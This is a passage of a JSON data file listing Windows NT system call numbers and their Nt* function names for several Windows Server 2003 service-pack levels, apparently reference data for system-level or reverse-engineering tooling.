"NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}}, "Windows Server 2003": {"SP0": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "R2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": 